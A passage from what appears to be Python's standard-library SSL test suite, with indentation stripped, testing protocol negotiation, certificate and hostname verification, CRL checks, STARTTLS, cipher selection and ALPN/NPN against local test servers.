# NOTE: we must enable "ALL" ciphers on the client, otherwise an
# SSLv23 client will send an SSLv3 hello (rather than SSLv2)
# starting from OpenSSL 1.0.0 (see issue #8322).
if client_context.protocol == ssl.PROTOCOL_SSLv23:
client_context.set_ciphers("ALL")
for ctx in (client_context, server_context):
ctx.verify_mode = certsreqs
ctx.load_cert_chain(CERTFILE)
ctx.load_verify_locations(CERTFILE)
try:
stats = server_params_test(client_context, server_context,
chatty=False, connectionchatty=False)
# Protocol mismatch can result in either an SSLError, or a
# "Connection reset by peer" error.
except ssl.SSLError:
if expect_success:
raise
except socket.error as e:
if expect_success or e.errno != errno.ECONNRESET:
raise
else:
if not expect_success:
raise AssertionError(
"Client protocol %s succeeded with server protocol %s!"
% (ssl.get_protocol_name(client_protocol),
ssl.get_protocol_name(server_protocol)))
elif (expect_success is not True
and expect_success != stats['version']):
raise AssertionError("version mismatch: expected %r, got %r"
% (expect_success, stats['version']))
class ThreadedTests(unittest.TestCase):
@skip_if_broken_ubuntu_ssl
def test_echo(self):
"""Basic test of an SSL client connecting to a server"""
if support.verbose:
sys.stdout.write("\n")
for protocol in PROTOCOLS:
context = ssl.SSLContext(protocol)
context.load_cert_chain(CERTFILE)
server_params_test(context, context,
chatty=True, connectionchatty=True)
def test_getpeercert(self):
if support.verbose:
sys.stdout.write("\n")
context = ssl.SSLContext(ssl.PROTOCOL_SSLv23)
context.verify_mode = ssl.CERT_REQUIRED
context.load_verify_locations(CERTFILE)
context.load_cert_chain(CERTFILE)
server = ThreadedEchoServer(context=context, chatty=False)
with server:
s = context.wrap_socket(socket.socket(),
do_handshake_on_connect=False)
s.connect((HOST, server.port))
# getpeercert() raise ValueError while the handshake isn't
# done.
with self.assertRaises(ValueError):
s.getpeercert()
s.do_handshake()
cert = s.getpeercert()
self.assertTrue(cert, "Can't get peer certificate.")
cipher = s.cipher()
if support.verbose:
sys.stdout.write(pprint.pformat(cert) + '\n')
sys.stdout.write("Connection cipher is " + str(cipher) + '.\n')
if 'subject' not in cert:
self.fail("No subject field in certificate: %s." %
pprint.pformat(cert))
if ((('organizationName', 'Python Software Foundation'),)
not in cert['subject']):
self.fail(
"Missing or invalid 'organizationName' field in certificate subject; "
"should be 'Python Software Foundation'.")
self.assertIn('notBefore', cert)
self.assertIn('notAfter', cert)
before = ssl.cert_time_to_seconds(cert['notBefore'])
after = ssl.cert_time_to_seconds(cert['notAfter'])
self.assertLess(before, after)
s.close()
@unittest.skipUnless(have_verify_flags(),
"verify_flags need OpenSSL > 0.9.8")
def test_crl_check(self):
if support.verbose:
sys.stdout.write("\n")
server_context = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
server_context.load_cert_chain(SIGNED_CERTFILE)
context = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
context.verify_mode = ssl.CERT_REQUIRED
context.load_verify_locations(SIGNING_CA)
tf = getattr(ssl, "VERIFY_X509_TRUSTED_FIRST", 0)
self.assertEqual(context.verify_flags, ssl.VERIFY_DEFAULT | tf)
# VERIFY_DEFAULT should pass
server = ThreadedEchoServer(context=server_context, chatty=True)
with server:
with closing(context.wrap_socket(socket.socket())) as s:
s.connect((HOST, server.port))
cert = s.getpeercert()
self.assertTrue(cert, "Can't get peer certificate.")
# VERIFY_CRL_CHECK_LEAF without a loaded CRL file fails
context.verify_flags |= ssl.VERIFY_CRL_CHECK_LEAF
server = ThreadedEchoServer(context=server_context, chatty=True)
with server:
with closing(context.wrap_socket(socket.socket())) as s:
with self.assertRaisesRegexp(ssl.SSLError,
"certificate verify failed"):
s.connect((HOST, server.port))
# now load a CRL file. The CRL file is signed by the CA.
context.load_verify_locations(CRLFILE)
server = ThreadedEchoServer(context=server_context, chatty=True)
with server:
with closing(context.wrap_socket(socket.socket())) as s:
s.connect((HOST, server.port))
cert = s.getpeercert()
self.assertTrue(cert, "Can't get peer certificate.")
def test_check_hostname(self):
if support.verbose:
sys.stdout.write("\n")
server_context = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
server_context.load_cert_chain(SIGNED_CERTFILE)
context = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
context.verify_mode = ssl.CERT_REQUIRED
context.check_hostname = True
context.load_verify_locations(SIGNING_CA)
# correct hostname should verify
server = ThreadedEchoServer(context=server_context, chatty=True)
with server:
with closing(context.wrap_socket(socket.socket(),
server_hostname="localhost")) as s:
s.connect((HOST, server.port))
cert = s.getpeercert()
self.assertTrue(cert, "Can't get peer certificate.")
# incorrect hostname should raise an exception
server = ThreadedEchoServer(context=server_context, chatty=True)
with server:
with closing(context.wrap_socket(socket.socket(),
server_hostname="invalid")) as s:
with self.assertRaisesRegexp(ssl.CertificateError,
"hostname 'invalid' doesn't match u?'localhost'"):
s.connect((HOST, server.port))
# missing server_hostname arg should cause an exception, too
server = ThreadedEchoServer(context=server_context, chatty=True)
with server:
with closing(socket.socket()) as s:
with self.assertRaisesRegexp(ValueError,
"check_hostname requires server_hostname"):
context.wrap_socket(s)
def test_empty_cert(self):
"""Connecting with an empty cert file"""
bad_cert_test(os.path.join(os.path.dirname(__file__) or os.curdir,
"nullcert.pem"))
def test_malformed_cert(self):
"""Connecting with a badly formatted certificate (syntax error)"""
bad_cert_test(os.path.join(os.path.dirname(__file__) or os.curdir,
"badcert.pem"))
def test_nonexisting_cert(self):
"""Connecting with a non-existing cert file"""
bad_cert_test(os.path.join(os.path.dirname(__file__) or os.curdir,
"wrongcert.pem"))
def test_malformed_key(self):
"""Connecting with a badly formatted key (syntax error)"""
bad_cert_test(os.path.join(os.path.dirname(__file__) or os.curdir,
"badkey.pem"))
def test_rude_shutdown(self):
"""A brutal shutdown of an SSL server should raise an OSError
in the client when attempting handshake.
"""
listener_ready = threading.Event()
listener_gone = threading.Event()
s = socket.socket()
port = support.bind_port(s, HOST)
# `listener` runs in a thread. It sits in an accept() until
# the main thread connects. Then it rudely closes the socket,
# and sets Event `listener_gone` to let the main thread know
# the socket is gone.
def listener():
s.listen(5)
listener_ready.set()
newsock, addr = s.accept()
newsock.close()
s.close()
listener_gone.set()
def connector():
listener_ready.wait()
with closing(socket.socket()) as c:
c.connect((HOST, port))
listener_gone.wait()
try:
ssl_sock = ssl.wrap_socket(c)
except socket.error:
pass
else:
self.fail('connecting to closed SSL socket should have failed')
t = threading.Thread(target=listener)
t.start()
try:
connector()
finally:
t.join()
@skip_if_broken_ubuntu_ssl
@unittest.skipUnless(hasattr(ssl, 'PROTOCOL_SSLv2'),
"OpenSSL is compiled without SSLv2 support")
def test_protocol_sslv2(self):
"""Connecting to an SSLv2 server with various client options"""
if support.verbose:
sys.stdout.write("\n")
try_protocol_combo(ssl.PROTOCOL_SSLv2, ssl.PROTOCOL_SSLv2, True)
try_protocol_combo(ssl.PROTOCOL_SSLv2, ssl.PROTOCOL_SSLv2, True, ssl.CERT_OPTIONAL)
try_protocol_combo(ssl.PROTOCOL_SSLv2, ssl.PROTOCOL_SSLv2, True, ssl.CERT_REQUIRED)
try_protocol_combo(ssl.PROTOCOL_SSLv2, ssl.PROTOCOL_SSLv23, False)
try_protocol_combo(ssl.PROTOCOL_SSLv2, ssl.PROTOCOL_SSLv3, False)
try_protocol_combo(ssl.PROTOCOL_SSLv2, ssl.PROTOCOL_TLSv1, False)
# SSLv23 client with specific SSL options
if no_sslv2_implies_sslv3_hello():
# No SSLv2 => client will use an SSLv3 hello on recent OpenSSLs
try_protocol_combo(ssl.PROTOCOL_SSLv2, ssl.PROTOCOL_SSLv23, False,
client_options=ssl.OP_NO_SSLv2)
try_protocol_combo(ssl.PROTOCOL_SSLv2, ssl.PROTOCOL_SSLv23, False,
client_options=ssl.OP_NO_SSLv3)
try_protocol_combo(ssl.PROTOCOL_SSLv2, ssl.PROTOCOL_SSLv23, False,
client_options=ssl.OP_NO_TLSv1)
@skip_if_broken_ubuntu_ssl
def test_protocol_sslv23(self):
"""Connecting to an SSLv23 server with various client options"""
if support.verbose:
sys.stdout.write("\n")
if hasattr(ssl, 'PROTOCOL_SSLv2'):
try:
try_protocol_combo(ssl.PROTOCOL_SSLv23, ssl.PROTOCOL_SSLv2, True)
except socket.error as x:
# this fails on some older versions of OpenSSL (0.9.7l, for instance)
if support.verbose:
sys.stdout.write(
" SSL2 client to SSL23 server test unexpectedly failed:\n %s\n"
% str(x))
if hasattr(ssl, 'PROTOCOL_SSLv3'):
try_protocol_combo(ssl.PROTOCOL_SSLv23, ssl.PROTOCOL_SSLv3, False)
try_protocol_combo(ssl.PROTOCOL_SSLv23, ssl.PROTOCOL_SSLv23, True)
try_protocol_combo(ssl.PROTOCOL_SSLv23, ssl.PROTOCOL_TLSv1, 'TLSv1')
if hasattr(ssl, 'PROTOCOL_SSLv3'):
try_protocol_combo(ssl.PROTOCOL_SSLv23, ssl.PROTOCOL_SSLv3, False, ssl.CERT_OPTIONAL)
try_protocol_combo(ssl.PROTOCOL_SSLv23, ssl.PROTOCOL_SSLv23, True, ssl.CERT_OPTIONAL)
try_protocol_combo(ssl.PROTOCOL_SSLv23, ssl.PROTOCOL_TLSv1, 'TLSv1', ssl.CERT_OPTIONAL)
if hasattr(ssl, 'PROTOCOL_SSLv3'):
try_protocol_combo(ssl.PROTOCOL_SSLv23, ssl.PROTOCOL_SSLv3, False, ssl.CERT_REQUIRED)
try_protocol_combo(ssl.PROTOCOL_SSLv23, ssl.PROTOCOL_SSLv23, True, ssl.CERT_REQUIRED)
try_protocol_combo(ssl.PROTOCOL_SSLv23, ssl.PROTOCOL_TLSv1, 'TLSv1', ssl.CERT_REQUIRED)
# Server with specific SSL options
if hasattr(ssl, 'PROTOCOL_SSLv3'):
try_protocol_combo(ssl.PROTOCOL_SSLv23, ssl.PROTOCOL_SSLv3, False,
server_options=ssl.OP_NO_SSLv3)
# Will choose TLSv1
try_protocol_combo(ssl.PROTOCOL_SSLv23, ssl.PROTOCOL_SSLv23, True,
server_options=ssl.OP_NO_SSLv2 | ssl.OP_NO_SSLv3)
try_protocol_combo(ssl.PROTOCOL_SSLv23, ssl.PROTOCOL_TLSv1, False,
server_options=ssl.OP_NO_TLSv1)
@skip_if_broken_ubuntu_ssl
@unittest.skipUnless(hasattr(ssl, 'PROTOCOL_SSLv3'),
"OpenSSL is compiled without SSLv3 support")
def test_protocol_sslv3(self):
"""Connecting to an SSLv3 server with various client options"""
if support.verbose:
sys.stdout.write("\n")
try_protocol_combo(ssl.PROTOCOL_SSLv3, ssl.PROTOCOL_SSLv3, 'SSLv3')
try_protocol_combo(ssl.PROTOCOL_SSLv3, ssl.PROTOCOL_SSLv3, 'SSLv3', ssl.CERT_OPTIONAL)
try_protocol_combo(ssl.PROTOCOL_SSLv3, ssl.PROTOCOL_SSLv3, 'SSLv3', ssl.CERT_REQUIRED)
if hasattr(ssl, 'PROTOCOL_SSLv2'):
try_protocol_combo(ssl.PROTOCOL_SSLv3, ssl.PROTOCOL_SSLv2, False)
try_protocol_combo(ssl.PROTOCOL_SSLv3, ssl.PROTOCOL_SSLv23, False,
client_options=ssl.OP_NO_SSLv3)
try_protocol_combo(ssl.PROTOCOL_SSLv3, ssl.PROTOCOL_TLSv1, False)
if no_sslv2_implies_sslv3_hello():
# No SSLv2 => client will use an SSLv3 hello on recent OpenSSLs
try_protocol_combo(ssl.PROTOCOL_SSLv3, ssl.PROTOCOL_SSLv23,
False, client_options=ssl.OP_NO_SSLv2)
@skip_if_broken_ubuntu_ssl
def test_protocol_tlsv1(self):
"""Connecting to a TLSv1 server with various client options"""
if support.verbose:
sys.stdout.write("\n")
try_protocol_combo(ssl.PROTOCOL_TLSv1, ssl.PROTOCOL_TLSv1, 'TLSv1')
try_protocol_combo(ssl.PROTOCOL_TLSv1, ssl.PROTOCOL_TLSv1, 'TLSv1', ssl.CERT_OPTIONAL)
try_protocol_combo(ssl.PROTOCOL_TLSv1, ssl.PROTOCOL_TLSv1, 'TLSv1', ssl.CERT_REQUIRED)
if hasattr(ssl, 'PROTOCOL_SSLv2'):
try_protocol_combo(ssl.PROTOCOL_TLSv1, ssl.PROTOCOL_SSLv2, False)
if hasattr(ssl, 'PROTOCOL_SSLv3'):
try_protocol_combo(ssl.PROTOCOL_TLSv1, ssl.PROTOCOL_SSLv3, False)
try_protocol_combo(ssl.PROTOCOL_TLSv1, ssl.PROTOCOL_SSLv23, False,
client_options=ssl.OP_NO_TLSv1)
@skip_if_broken_ubuntu_ssl
@unittest.skipUnless(hasattr(ssl, "PROTOCOL_TLSv1_1"),
"TLS version 1.1 not supported.")
def test_protocol_tlsv1_1(self):
"""Connecting to a TLSv1.1 server with various client options.
Testing against older TLS versions."""
if support.verbose:
sys.stdout.write("\n")
try_protocol_combo(ssl.PROTOCOL_TLSv1_1, ssl.PROTOCOL_TLSv1_1, 'TLSv1.1')
if hasattr(ssl, 'PROTOCOL_SSLv2'):
try_protocol_combo(ssl.PROTOCOL_TLSv1_1, ssl.PROTOCOL_SSLv2, False)
if hasattr(ssl, 'PROTOCOL_SSLv3'):
try_protocol_combo(ssl.PROTOCOL_TLSv1_1, ssl.PROTOCOL_SSLv3, False)
try_protocol_combo(ssl.PROTOCOL_TLSv1_1, ssl.PROTOCOL_SSLv23, False,
client_options=ssl.OP_NO_TLSv1_1)
try_protocol_combo(ssl.PROTOCOL_SSLv23, ssl.PROTOCOL_TLSv1_1, 'TLSv1.1')
try_protocol_combo(ssl.PROTOCOL_TLSv1_1, ssl.PROTOCOL_TLSv1, False)
try_protocol_combo(ssl.PROTOCOL_TLSv1, ssl.PROTOCOL_TLSv1_1, False)
@skip_if_broken_ubuntu_ssl
@unittest.skipUnless(hasattr(ssl, "PROTOCOL_TLSv1_2"),
"TLS version 1.2 not supported.")
def test_protocol_tlsv1_2(self):
"""Connecting to a TLSv1.2 server with various client options.
Testing against older TLS versions."""
if support.verbose:
sys.stdout.write("\n")
try_protocol_combo(ssl.PROTOCOL_TLSv1_2, ssl.PROTOCOL_TLSv1_2, 'TLSv1.2',
server_options=ssl.OP_NO_SSLv3|ssl.OP_NO_SSLv2,
client_options=ssl.OP_NO_SSLv3|ssl.OP_NO_SSLv2,)
if hasattr(ssl, 'PROTOCOL_SSLv2'):
try_protocol_combo(ssl.PROTOCOL_TLSv1_2, ssl.PROTOCOL_SSLv2, False)
if hasattr(ssl, 'PROTOCOL_SSLv3'):
try_protocol_combo(ssl.PROTOCOL_TLSv1_2, ssl.PROTOCOL_SSLv3, False)
try_protocol_combo(ssl.PROTOCOL_TLSv1_2, ssl.PROTOCOL_SSLv23, False,
client_options=ssl.OP_NO_TLSv1_2)
try_protocol_combo(ssl.PROTOCOL_SSLv23, ssl.PROTOCOL_TLSv1_2, 'TLSv1.2')
try_protocol_combo(ssl.PROTOCOL_TLSv1_2, ssl.PROTOCOL_TLSv1, False)
try_protocol_combo(ssl.PROTOCOL_TLSv1, ssl.PROTOCOL_TLSv1_2, False)
try_protocol_combo(ssl.PROTOCOL_TLSv1_2, ssl.PROTOCOL_TLSv1_1, False)
try_protocol_combo(ssl.PROTOCOL_TLSv1_1, ssl.PROTOCOL_TLSv1_2, False)
def test_starttls(self):
"""Switching from clear text to encrypted and back again."""
msgs = (b"msg 1", b"MSG 2", b"STARTTLS", b"MSG 3", b"msg 4", b"ENDTLS", b"msg 5", b"msg 6")
server = ThreadedEchoServer(CERTFILE,
ssl_version=ssl.PROTOCOL_TLSv1,
starttls_server=True,
chatty=True,
connectionchatty=True)
wrapped = False
with server:
s = socket.socket()
s.setblocking(1)
s.connect((HOST, server.port))
if support.verbose:
sys.stdout.write("\n")
for indata in msgs:
if support.verbose:
sys.stdout.write(
" client: sending %r...\n" % indata)
if wrapped:
conn.write(indata)
outdata = conn.read()
else:
s.send(indata)
outdata = s.recv(1024)
msg = outdata.strip().lower()
if indata == b"STARTTLS" and msg.startswith(b"ok"):
# STARTTLS ok, switch to secure mode
if support.verbose:
sys.stdout.write(
" client: read %r from server, starting TLS...\n"
% msg)
conn = ssl.wrap_socket(s, ssl_version=ssl.PROTOCOL_TLSv1)
wrapped = True
elif indata == b"ENDTLS" and msg.startswith(b"ok"):
# ENDTLS ok, switch back to clear text
if support.verbose:
sys.stdout.write(
" client: read %r from server, ending TLS...\n"
% msg)
s = conn.unwrap()
wrapped = False
else:
if support.verbose:
sys.stdout.write(
" client: read %r from server\n" % msg)
if support.verbose:
sys.stdout.write(" client: closing connection.\n")
if wrapped:
conn.write(b"over\n")
else:
s.send(b"over\n")
if wrapped:
conn.close()
else:
s.close()
def test_socketserver(self):
"""Using a SocketServer to create and manage SSL connections."""
server = make_https_server(self, certfile=CERTFILE)
# try to connect
if support.verbose:
sys.stdout.write('\n')
with open(CERTFILE, 'rb') as f:
d1 = f.read()
d2 = ''
# now fetch the same data from the HTTPS server
url = 'https://localhost:%d/%s' % (
server.port, os.path.split(CERTFILE)[1])
context = ssl.create_default_context(cafile=CERTFILE)
f = urllib2.urlopen(url, context=context)
try:
dlen = f.info().getheader("content-length")
if dlen and (int(dlen) > 0):
d2 = f.read(int(dlen))
if support.verbose:
sys.stdout.write(
" client: read %d bytes from remote server '%s'\n"
% (len(d2), server))
finally:
f.close()
self.assertEqual(d1, d2)
def test_asyncore_server(self):
"""Check the example asyncore integration."""
indata = "TEST MESSAGE of mixed case\n"
if support.verbose:
sys.stdout.write("\n")
indata = b"FOO\n"
server = AsyncoreEchoServer(CERTFILE)
with server:
s = ssl.wrap_socket(socket.socket())
s.connect(('127.0.0.1', server.port))
if support.verbose:
sys.stdout.write(
" client: sending %r...\n" % indata)
s.write(indata)
outdata = s.read()
if support.verbose:
sys.stdout.write(" client: read %r\n" % outdata)
if outdata != indata.lower():
self.fail(
"bad data <<%r>> (%d) received; expected <<%r>> (%d)\n"
% (outdata[:20], len(outdata),
indata[:20].lower(), len(indata)))
s.write(b"over\n")
if support.verbose:
sys.stdout.write(" client: closing connection.\n")
s.close()
if support.verbose:
sys.stdout.write(" client: connection closed.\n")
def test_recv_send(self):
"""Test recv(), send() and friends."""
if support.verbose:
sys.stdout.write("\n")
server = ThreadedEchoServer(CERTFILE,
certreqs=ssl.CERT_NONE,
ssl_version=ssl.PROTOCOL_TLSv1,
cacerts=CERTFILE,
chatty=True,
connectionchatty=False)
with server:
s = ssl.wrap_socket(socket.socket(),
server_side=False,
certfile=CERTFILE,
ca_certs=CERTFILE,
cert_reqs=ssl.CERT_NONE,
ssl_version=ssl.PROTOCOL_TLSv1)
s.connect((HOST, server.port))
# helper methods for standardising recv* method signatures
def _recv_into():
b = bytearray(b"\0"*100)
count = s.recv_into(b)
return b[:count]
def _recvfrom_into():
b = bytearray(b"\0"*100)
count, addr = s.recvfrom_into(b)
return b[:count]
# (name, method, whether to expect success, *args)
send_methods = [
('send', s.send, True, []),
('sendto', s.sendto, False, ["some.address"]),
('sendall', s.sendall, True, []),
]
recv_methods = [
('recv', s.recv, True, []),
('recvfrom', s.recvfrom, False, ["some.address"]),
('recv_into', _recv_into, True, []),
('recvfrom_into', _recvfrom_into, False, []),
]
data_prefix = u"PREFIX_"
for meth_name, send_meth, expect_success, args in send_methods:
indata = (data_prefix + meth_name).encode('ascii')
try:
send_meth(indata, *args)
outdata = s.read()
if outdata != indata.lower():
self.fail(
"While sending with <<{name:s}>> bad data "
"<<{outdata:r}>> ({nout:d}) received; "
"expected <<{indata:r}>> ({nin:d})\n".format(
name=meth_name, outdata=outdata[:20],
nout=len(outdata),
indata=indata[:20], nin=len(indata)
)
)
except ValueError as e:
if expect_success:
self.fail(
"Failed to send with method <<{name:s}>>; "
"expected to succeed.\n".format(name=meth_name)
)
if not str(e).startswith(meth_name):
self.fail(
"Method <<{name:s}>> failed with unexpected "
"exception message: {exp:s}\n".format(
name=meth_name, exp=e
)
)
for meth_name, recv_meth, expect_success, args in recv_methods:
indata = (data_prefix + meth_name).encode('ascii')
try:
s.send(indata)
outdata = recv_meth(*args)
if outdata != indata.lower():
self.fail(
"While receiving with <<{name:s}>> bad data "
"<<{outdata:r}>> ({nout:d}) received; "
"expected <<{indata:r}>> ({nin:d})\n".format(
name=meth_name, outdata=outdata[:20],
nout=len(outdata),
indata=indata[:20], nin=len(indata)
)
)
except ValueError as e:
if expect_success:
self.fail(
"Failed to receive with method <<{name:s}>>; "
"expected to succeed.\n".format(name=meth_name)
)
if not str(e).startswith(meth_name):
self.fail(
"Method <<{name:s}>> failed with unexpected "
"exception message: {exp:s}\n".format(
name=meth_name, exp=e
)
)
# consume data
s.read()
s.write(b"over\n")
s.close()
def test_handshake_timeout(self):
# Issue #5103: SSL handshake must respect the socket timeout
server = socket.socket(socket.AF_INET)
host = "127.0.0.1"
port = support.bind_port(server)
started = threading.Event()
finish = False
def serve():
server.listen(5)
started.set()
conns = []
while not finish:
r, w, e = select.select([server], [], [], 0.1)
if server in r:
# Let the socket hang around rather than having
# it closed by garbage collection.
conns.append(server.accept()[0])
for sock in conns:
sock.close()
t = threading.Thread(target=serve)
t.start()
started.wait()
try:
try:
c = socket.socket(socket.AF_INET)
c.settimeout(0.2)
c.connect((host, port))
# Will attempt handshake and time out
self.assertRaisesRegexp(ssl.SSLError, "timed out",
ssl.wrap_socket, c)
finally:
c.close()
try:
c = socket.socket(socket.AF_INET)
c = ssl.wrap_socket(c)
c.settimeout(0.2)
# Will attempt handshake and time out
self.assertRaisesRegexp(ssl.SSLError, "timed out",
c.connect, (host, port))
finally:
c.close()
finally:
finish = True
t.join()
server.close()
def test_server_accept(self):
# Issue #16357: accept() on a SSLSocket created through
# SSLContext.wrap_socket().
context = ssl.SSLContext(ssl.PROTOCOL_SSLv23)
context.verify_mode = ssl.CERT_REQUIRED
context.load_verify_locations(CERTFILE)
context.load_cert_chain(CERTFILE)
server = socket.socket(socket.AF_INET)
host = "127.0.0.1"
port = support.bind_port(server)
server = context.wrap_socket(server, server_side=True)
evt = threading.Event()
remote = [None]
peer = [None]
def serve():
server.listen(5)
# Block on the accept and wait on the connection to close.
evt.set()
remote[0], peer[0] = server.accept()
remote[0].recv(1)
t = threading.Thread(target=serve)
t.start()
# Client wait until server setup and perform a connect.
evt.wait()
client = context.wrap_socket(socket.socket())
client.connect((host, port))
client_addr = client.getsockname()
client.close()
t.join()
remote[0].close()
server.close()
# Sanity checks.
self.assertIsInstance(remote[0], ssl.SSLSocket)
self.assertEqual(peer[0], client_addr)
def test_getpeercert_enotconn(self):
context = ssl.SSLContext(ssl.PROTOCOL_SSLv23)
with closing(context.wrap_socket(socket.socket())) as sock:
with self.assertRaises(socket.error) as cm:
sock.getpeercert()
self.assertEqual(cm.exception.errno, errno.ENOTCONN)
def test_do_handshake_enotconn(self):
context = ssl.SSLContext(ssl.PROTOCOL_SSLv23)
with closing(context.wrap_socket(socket.socket())) as sock:
with self.assertRaises(socket.error) as cm:
sock.do_handshake()
self.assertEqual(cm.exception.errno, errno.ENOTCONN)
def test_default_ciphers(self):
context = ssl.SSLContext(ssl.PROTOCOL_SSLv23)
try:
# Force a set of weak ciphers on our client context
context.set_ciphers("DES")
except ssl.SSLError:
self.skipTest("no DES cipher available")
with ThreadedEchoServer(CERTFILE,
ssl_version=ssl.PROTOCOL_SSLv23,
chatty=False) as server:
with closing(context.wrap_socket(socket.socket())) as s:
with self.assertRaises(ssl.SSLError):
s.connect((HOST, server.port))
self.assertIn("no shared cipher", str(server.conn_errors[0]))
def test_version_basic(self):
"""
Basic tests for SSLSocket.version().
More tests are done in the test_protocol_*() methods.
"""
context = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
with ThreadedEchoServer(CERTFILE,
ssl_version=ssl.PROTOCOL_TLSv1,
chatty=False) as server:
with closing(context.wrap_socket(socket.socket())) as s:
self.assertIs(s.version(), None)
s.connect((HOST, server.port))
self.assertEqual(s.version(), "TLSv1")
self.assertIs(s.version(), None)
@unittest.skipUnless(ssl.HAS_ECDH, "test requires ECDH-enabled OpenSSL")
def test_default_ecdh_curve(self):
# Issue #21015: elliptic curve-based Diffie Hellman key exchange
# should be enabled by default on SSL contexts.
context = ssl.SSLContext(ssl.PROTOCOL_SSLv23)
context.load_cert_chain(CERTFILE)
# Prior to OpenSSL 1.0.0, ECDH ciphers have to be enabled
# explicitly using the 'ECCdraft' cipher alias. Otherwise,
# our default cipher list should prefer ECDH-based ciphers
# automatically.
if ssl.OPENSSL_VERSION_INFO < (1, 0, 0):
context.set_ciphers("ECCdraft:ECDH")
with ThreadedEchoServer(context=context) as server:
with closing(context.wrap_socket(socket.socket())) as s:
s.connect((HOST, server.port))
self.assertIn("ECDH", s.cipher()[0])
@unittest.skipUnless("tls-unique" in ssl.CHANNEL_BINDING_TYPES,
"'tls-unique' channel binding not available")
def test_tls_unique_channel_binding(self):
"""Test tls-unique channel binding."""
if support.verbose:
sys.stdout.write("\n")
server = ThreadedEchoServer(CERTFILE,
certreqs=ssl.CERT_NONE,
ssl_version=ssl.PROTOCOL_TLSv1,
cacerts=CERTFILE,
chatty=True,
connectionchatty=False)
with server:
s = ssl.wrap_socket(socket.socket(),
server_side=False,
certfile=CERTFILE,
ca_certs=CERTFILE,
cert_reqs=ssl.CERT_NONE,
ssl_version=ssl.PROTOCOL_TLSv1)
s.connect((HOST, server.port))
# get the data
cb_data = s.get_channel_binding("tls-unique")
if support.verbose:
sys.stdout.write(" got channel binding data: {0!r}\n"
.format(cb_data))
# check if it is sane
self.assertIsNotNone(cb_data)
self.assertEqual(len(cb_data), 12) # True for TLSv1
# and compare with the peers version
s.write(b"CB tls-unique\n")
peer_data_repr = s.read().strip()
self.assertEqual(peer_data_repr,
repr(cb_data).encode("us-ascii"))
s.close()
# now, again
s = ssl.wrap_socket(socket.socket(),
server_side=False,
certfile=CERTFILE,
ca_certs=CERTFILE,
cert_reqs=ssl.CERT_NONE,
ssl_version=ssl.PROTOCOL_TLSv1)
s.connect((HOST, server.port))
new_cb_data = s.get_channel_binding("tls-unique")
if support.verbose:
sys.stdout.write(" got another channel binding data: {0!r}\n"
.format(new_cb_data))
# is it really unique
self.assertNotEqual(cb_data, new_cb_data)
self.assertIsNotNone(cb_data)
self.assertEqual(len(cb_data), 12) # True for TLSv1
s.write(b"CB tls-unique\n")
peer_data_repr = s.read().strip()
self.assertEqual(peer_data_repr,
repr(new_cb_data).encode("us-ascii"))
s.close()
def test_compression(self):
context = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
context.load_cert_chain(CERTFILE)
stats = server_params_test(context, context,
chatty=True, connectionchatty=True)
if support.verbose:
sys.stdout.write(" got compression: {!r}\n".format(stats['compression']))
self.assertIn(stats['compression'], { None, 'ZLIB', 'RLE' })
@unittest.skipUnless(hasattr(ssl, 'OP_NO_COMPRESSION'),
"ssl.OP_NO_COMPRESSION needed for this test")
def test_compression_disabled(self):
context = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
context.load_cert_chain(CERTFILE)
context.options |= ssl.OP_NO_COMPRESSION
stats = server_params_test(context, context,
chatty=True, connectionchatty=True)
self.assertIs(stats['compression'], None)
def test_dh_params(self):
# Check we can get a connection with ephemeral Diffie-Hellman
context = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
context.load_cert_chain(CERTFILE)
context.load_dh_params(DHFILE)
context.set_ciphers("kEDH")
stats = server_params_test(context, context,
chatty=True, connectionchatty=True)
cipher = stats["cipher"][0]
parts = cipher.split("-")
if "ADH" not in parts and "EDH" not in parts and "DHE" not in parts:
self.fail("Non-DH cipher: " + cipher[0])
def test_selected_alpn_protocol(self):
# selected_alpn_protocol() is None unless ALPN is used.
context = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
context.load_cert_chain(CERTFILE)
stats = server_params_test(context, context,
chatty=True, connectionchatty=True)
self.assertIs(stats['client_alpn_protocol'], None)
@unittest.skipUnless(ssl.HAS_ALPN, "ALPN support required")
def test_selected_alpn_protocol_if_server_uses_alpn(self):
# selected_alpn_protocol() is None unless ALPN is used by the client.
client_context = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
client_context.load_verify_locations(CERTFILE)
server_context = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
server_context.load_cert_chain(CERTFILE)
server_context.set_alpn_protocols(['foo', 'bar'])
stats = server_params_test(client_context, server_context,
chatty=True, connectionchatty=True)
self.assertIs(stats['client_alpn_protocol'], None)
@unittest.skipUnless(ssl.HAS_ALPN, "ALPN support needed for this test")
def test_alpn_protocols(self):
server_protocols = ['foo', 'bar', 'milkshake']
protocol_tests = [
(['foo', 'bar'], 'foo'),
(['bar', 'foo'], 'foo'),
(['milkshake'], 'milkshake'),
(['http/3.0', 'http/4.0'], None)
]
for client_protocols, expected in protocol_tests:
server_context = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
server_context.load_cert_chain(CERTFILE)
server_context.set_alpn_protocols(server_protocols)
client_context = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
client_context.load_cert_chain(CERTFILE)
client_context.set_alpn_protocols(client_protocols)
stats = server_params_test(client_context, server_context,
chatty=True, connectionchatty=True)
msg = "failed trying %s (s) and %s (c).\n" \
"was expecting %s, but got %%s from the %%s" \
% (str(server_protocols), str(client_protocols),
str(expected))
client_result = stats['client_alpn_protocol']
self.assertEqual(client_result, expected, msg % (client_result, "client"))
server_result = stats['server_alpn_protocols'][-1] \
if len(stats['server_alpn_protocols']) else 'nothing'
self.assertEqual(server_result, expected, msg % (server_result, "server"))
def test_selected_npn_protocol(self):
# selected_npn_protocol() is None unless NPN is used
context = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
context.load_cert_chain(CERTFILE)
stats = server_params_test(context, context,
chatty=True, connectionchatty=True)
self.assertIs(stats['client_npn_protocol'], None)
@unittest.skipUnless(ssl.HAS_NPN, "NPN support needed for this test")
def test_npn_protocols(self):
server_protocols = ['http/1.1', 'spdy/2']
protocol_tests = [
